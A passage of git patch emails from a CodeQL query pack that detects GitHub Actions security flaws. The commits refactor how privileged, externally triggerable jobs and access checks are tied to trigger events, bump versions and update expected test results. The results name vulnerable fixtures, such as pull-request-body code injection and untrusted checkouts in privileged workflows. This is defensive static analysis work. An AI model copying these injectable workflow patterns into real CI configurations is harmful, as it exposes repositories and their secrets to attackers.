b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.51 +version: 0.1.52 groups: [actions, queries] suites: codeql-suites extractor: javascript From 356c20015832da0d2bf43c6d5f90c7beef74d4ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:03:55 +0200 Subject: [PATCH 0535/1267] Composite Action steps's getEnclosingJob should return the calling job --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d1c7718d77b..7659661bdac 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -105,7 +105,10 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets the enclosing Job. */ - JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } + JobImpl getEnclosingJob() { + result.getAChildNode*() = this.getParentNode() or + result = this.getEnclosingCompositeAction().getACallerJob() + } /** * Gets the enclosing workflow if any. From 43b61eb072615ac98509e19817540b7792b78eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:04:57 +0200 Subject: [PATCH 0536/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4c1252d976d..a8a194c52ba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.52 +version: 0.1.53 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a8c891b256a..e4cb8969649 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.52 +version: 0.1.53 groups: [actions, queries] suites: codeql-suites extractor: javascript From 153fb492f72724145785678206e81668ae114f76 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:14:37 +0200 Subject: [PATCH 0537/1267] Update tests --- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + .../Security/CWE-829/.github/workflows/untrusted_checkout3.yml | 2 +- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d2..609b09fdfef 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -438,6 +438,7 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index e0d32875ee7..0a38be8b12b 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -1,6 +1,6 @@ name: Test on: - workflow_call: + workflow_run: workflows: [Trigger] types: [completed] diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 13637396f90..afae2454078 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -274,6 +274,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | From b1ddbc9d13dab6b653f4c8aebdda2eb0df87635e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:25:56 +0200 Subject: [PATCH 0538/1267] Improve Control Checks --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/Helper.qll | 38 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 67 ++++++++--------- .../codeql/actions/security/ControlChecks.qll | 7 +- .../Security/CWE-074/OutputClobberingHigh.ql | 13 +--- .../CWE-077/EnvPathInjectionCritical.ql | 13 +--- .../CWE-077/EnvVarInjectionCritical.ql | 17 ++--- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 10 +-- .../CWE-349/CachePoisoningViaCodeInjection.ql | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 29 ++++---- .../CachePoisoningViaPoisonableStep.ql | 25 ++++--- .../UntrustedCheckoutTOCTOUCritical.ql | 16 ++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +-- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 5 +- .../CWE-829/UntrustedCheckoutCritical.ql | 12 +-- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-829/UntrustedCheckoutMedium.ql | 2 - .../CWE-094/CodeInjectionMedium.expected | 1 - .../UntrustedCheckoutCritical.expected | 73 ++++++++++--------- 22 files changed, 168 insertions(+), 217 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c83abb1ea1d..a1651eedc47 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -79,8 +79,6 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } - - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** @@ -200,7 +198,9 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } + predicate isPrivilegedExternallyTriggerable(Event event) { + super.isPrivilegedExternallyTriggerable(event) + } } abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 0df7b125019..9356950f571 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -238,44 +238,12 @@ predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run.getScript(), "GITHUB_PATH", path) } -predicate inPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedContext(AstNode node) { - inPrivilegedCompositeAction(node) - or - inPrivilegedExternallyTriggerableJob(node) -} - -predicate inNonPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - not a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inNonPrivilegedJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - not j.isPrivilegedExternallyTriggerable() - ) +predicate inPrivilegedContext(AstNode node, Event event) { + node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } predicate inNonPrivilegedContext(AstNode node) { - inNonPrivilegedCompositeAction(node) - or - inNonPrivilegedJob(node) + not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } string partialFileContentRegexp() { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7659661bdac..154d466ab7d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -359,18 +359,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { } EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } - - /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - // the action is externally triggerable - exists(JobImpl caller, EventImpl event | - caller = this.getACallerJob() and - event = caller.getATriggerEvent() and - event.isExternallyTriggerable() and - // the action is privileged - (this.isPrivileged() or caller.isPrivileged()) - ) - } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -970,31 +958,30 @@ class JobImpl extends AstNodeImpl, TJobNode { } /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | this.getATriggerEvent() = e | - // job is triggereable by an external user - e.isExternallyTriggerable() and - // no matter if `pull_request` is granted write permissions or access to secrets - // when the job is triggered by a `pull_request` event from a fork, they will get revoked - not e.getName() = "pull_request" and - ( - // job is privileged (write access or access to secrets) - this.isPrivileged() - or - // the trigger event is __normally__ privileged - e.isPrivileged() and - // and we have no runtime data to prove otherwise - not this.hasRuntimeData() and - // and the job is not explicitly non-privileged - not ( - ( - this.hasExplicitNonePermission() or - this.hasImplicitNonePermission() or - this.hasExplicitReadPermission() or - this.hasImplicitReadPermission() - ) and - not this.hasExplicitSecretAccess() - ) + predicate isPrivilegedExternallyTriggerable(EventImpl event) { + this.getATriggerEvent() = event and + // job is triggereable by an external user + event.isExternallyTriggerable() and + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not event.getName() = "pull_request" and + ( + // job is privileged (write access or access to secrets) + this.isPrivileged() + or + // the trigger event is __normally__ privileged + event.isPrivileged() and + // and we have no runtime data to prove otherwise + not this.hasRuntimeData() and + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() ) ) } @@ -1073,6 +1060,12 @@ class StepImpl extends AstNodeImpl, TStepNode { override YamlMapping getNode() { result = n } + override JobImpl getEnclosingJob() { + // if a step is within a composite action, we should follow the caller job + result = this.getEnclosingCompositeAction().getACallerJob() or + result = super.getEnclosingJob() + } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a3e1e15fe8..052b22cd338 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,9 +38,12 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event = step.getEnclosingWorkflow().getATriggerEvent() and + // The check dominates the step it should protect this.dominates(step) and - this.protectsCategoryAndEvent(category, event.getName()) + // The check is effective against the event and category + this.protectsCategoryAndEvent(category, event.getName()) and + // The check can be triggered by the event + this.getEnclosingJob().getATriggerEvent() = event } predicate dominates(Step step) { diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 0ead5aa7689..2000e2100ae 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -18,25 +18,20 @@ import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink, Event event where OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 9fa066d195c..54e013f1091 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -17,24 +17,19 @@ import codeql.actions.security.EnvPathInjectionQuery import EnvPathInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink, Event event where EnvPathInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 806bae2a91d..b301915d79c 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -18,30 +18,23 @@ import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Event event where EnvVarInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "envvar-injection") + check.protects(sink.getNode().asExpr(), event, "envvar-injection") ) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index f5a4aed3eca..80281e8db30 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -17,10 +17,10 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 6f1f6008a06..2626de31935 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -16,14 +16,12 @@ import codeql.actions.security.ArgumentInjectionQuery import ArgumentInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink, Event event where ArgumentInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "argument-injection") + check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, "Potential argument injection in $@ command, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ec4925d24a0..ef66ac229f2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -19,15 +19,11 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event event where CodeInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") - ) and + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 67b615d115a..411d0052d4b 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -18,27 +18,27 @@ import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph import codeql.actions.security.ControlChecks -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob job, Event event where CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and - j.getATriggerEvent() = e and + job = sink.getNode().asExpr().getEnclosingJob() and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and // the checkout is not controlled by an access check not exists(ControlCheck check | - check.protects(source.getNode().asExpr(), j.getATriggerEvent(), "code-injection") + check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and + not job.isPrivileged() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index b6df022329d..bda8224925e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -43,10 +43,10 @@ predicate controlledCachePath(string cache_path, string untrusted_path) { query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and @@ -58,35 +58,36 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job writes to the cache // (No need to follow the checkout/download step since the cache is normally write after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and + job.getAStep() = step and + step instanceof CacheWritingStep and ( // we dont know what code can be controlled by the attacker path = "?" or // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" + step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) ) and - not s instanceof PoisonableStep -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not step instanceof PoisonableStep +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 0750a02930e..74f49fccd30 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -20,10 +20,10 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, Step source, Step s, string message, string path +from LocalJob job, Event event, Step source, Step step, string message, string path where // the job checkouts untrusted code from a pull request or downloads an untrusted artifact - j.getAStep() = source and + job.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and @@ -35,26 +35,27 @@ where ) and // the checkout/download is not controlled by an access check not exists(ControlCheck check | - check.protects(source, j.getATriggerEvent(), ["untrusted-checkout", "artifact-poisoning"]) + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) ) and - j.getATriggerEvent() = e and + job.getATriggerEvent() = event and // job can be triggered by an external user - e.isExternallyTriggerable() and + event.isExternallyTriggerable() and ( // the workflow runs in the context of the default branch - runsOnDefaultBranch(e) + runsOnDefaultBranch(event) or // the workflow's caller runs in the context of the default branch - e.getName() = "workflow_call" and + event.getName() = "workflow_call" and exists(ExternalJob caller | - caller.getCallee() = j.getLocation().getFile().getRelativePath() and + caller.getCallee() = job.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and + source.getAFollowingStep() = step and + step instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() -select s, source, s, "Potential cache poisoning in the context of the default branch " + message + not job.isPrivileged() +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 7c7ab15de31..11897c464bf 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,16 +18,18 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check +from + LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, + Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() = s and + checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") -select s, checkout, s, + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") +select step, checkout, step, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 7f584e00c9a..5956b52ccbe 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ 